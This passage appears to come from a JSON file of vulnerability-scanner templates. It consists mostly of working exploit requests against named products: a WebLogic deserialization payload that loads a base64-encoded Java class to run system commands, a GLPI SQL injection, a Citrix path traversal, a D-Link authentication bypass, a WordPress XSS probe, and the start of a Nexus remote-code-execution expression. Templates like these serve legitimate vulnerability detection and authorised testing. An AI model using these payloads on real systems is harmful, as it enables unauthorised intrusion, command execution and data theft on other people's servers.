index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Manager","License:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   